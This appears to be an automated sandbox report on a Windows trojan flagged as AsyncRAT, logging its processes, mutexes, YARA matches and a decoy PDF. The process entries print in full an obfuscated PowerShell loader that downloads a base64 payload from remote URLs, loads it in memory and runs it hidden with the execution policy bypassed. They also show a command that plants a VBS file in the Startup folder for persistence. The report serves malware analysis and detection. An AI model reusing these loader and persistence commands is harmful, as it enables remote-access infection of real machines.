Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B29FB0 0_2_00007FF681B29FB0
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A28740 0_2_00007FF681A28740
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681A8BFA0 0_2_00007FF681A8BFA0
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B27F60 0_2_00007FF681B27F60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 71_2_00007FF7B39E3292 71_2_00007FF7B39E3292
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 125_2_01870B93 125_2_01870B93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 126_2_01030B92 126_2_01030B92
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: String function: 00007FF681B4AC00 appears 214 times
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: String function: 00007FF681B4AD00 appears 124 times
Yara signature match
Source: 125.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 113.2.powershell.exe.237b3bb2660.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000007D.00000002.2600075638.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000071.00000002.2463346324.00000237B3BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: powershell.exe PID: 3768, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6320, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8200, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 18.2.powershell.exe.1af2a0cd0e8.1.raw.unpack, State.cs Cryptographic APIs: 'CreateDecryptor'
Source: 18.2.powershell.exe.1af2a0cd0e8.1.raw.unpack, ClassTestsList.cs Cryptographic APIs: 'CreateDecryptor'
Source: 18.2.powershell.exe.1af2a0cd0e8.1.raw.unpack, ClassTestsList.cs Cryptographic APIs: 'CreateDecryptor'
Source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@236/134@0/6
Source: privacy_policy.pdf.0.dr Initial sample: https://copyright.columbia.edu/index.html
Source: privacy_policy.pdf.0.dr Initial sample: http://copyright.cornell.edu/
Source: privacy_policy.pdf.0.dr Initial sample: https://creativecommons.org/
Source: privacy_policy.pdf.0.dr Initial sample: https://drive.google.com/file/d/0BxyQzf2unIzKM0FMZ2pydklwMWc/view
Source: privacy_policy.pdf.0.dr Initial sample: https://www.bu.edu/academics/policies/intellectual-property-policy/
Source: privacy_policy.pdf.0.dr Initial sample: http://fairuse.stanford.edu/
Source: privacy_policy.pdf.0.dr Initial sample: https://ccsearch.creativecommons.org/
Source: C:\Users\user\Desktop\TM3utH2CsU.exe File created: C:\Users\Public\Documents\privacy_policy.pdf Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3800:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2732:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8336:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9104:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9048:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8676:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2032:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3644:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8512:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8292:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8552:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3332:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8920:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6044:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9156:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9184:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8740:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\mR0UgXYus56nykvx
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1704:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8748:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3936:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8408:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4024:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9012:120:WilError_03
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-09-25 06-36-23-782.log Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
Source: TM3utH2CsU.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\TM3utH2CsU.exe "C:\Users\user\Desktop\TM3utH2CsU.exe"
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C start C:\Users\Public\Documents\privacy_policy.pdf
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\privacy_policy.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1724,i,13391688068409325489,10583059356098987935,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
